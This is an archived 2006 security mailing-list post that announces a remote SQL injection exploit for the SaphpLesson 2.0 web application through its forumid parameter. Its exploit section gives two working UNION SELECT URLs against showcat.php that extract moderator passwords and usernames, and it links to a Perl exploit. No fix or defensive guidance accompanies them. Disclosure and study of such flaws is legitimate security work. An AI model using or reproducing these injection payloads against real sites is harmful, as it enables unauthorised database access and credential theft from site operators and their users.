|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
SaphpLesson 2.0 (forumid) Remote SQL Injection Exploit
selfar2002
hotmail.com
Date: Wed Apr 12 2006 - 16:33:13 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
---------------------------------------------------------------------------
SaphpLesson 2.0 (forumid) Remote SQL Injection Exploit
---------------------------------------------------------------------------
Discovered By SnIpEr_SA
Author : SnIpEr_SA
Exploit in Perl : http://www.milw0rm.com/exploits/download/1530
Remote : Yes
Local : No
Critical Level : Dangerous
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Indexu
Application : SaphpLesson
version : 2.0
URL : http://www.Arabless.com/
...
------------------------------------------------------------------
Exploit:
~~~~~~~~
# For password # http://www.example.com/path/showcat.php?forumid=-1%20union%20select%20ModPassword%20from%20modretor #
For username # http://www.example.com/path/showcat.php?forumid=-1%20union%20select%20ModName%20from%20modretor
---------------------------------------------------------------------------
Contact:
~~~~~~~~
SnIpEr_SA
E-mail: selfar2002hotmail.com
E-mail: SnIpEr_SA[at]Basdmail[dot]org
Homepage: http://www.3asfh.com/ & http://www.lezr.com/
Greetz: All My Frind
-------------------------------- [ EOF ] ----------------------------------
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]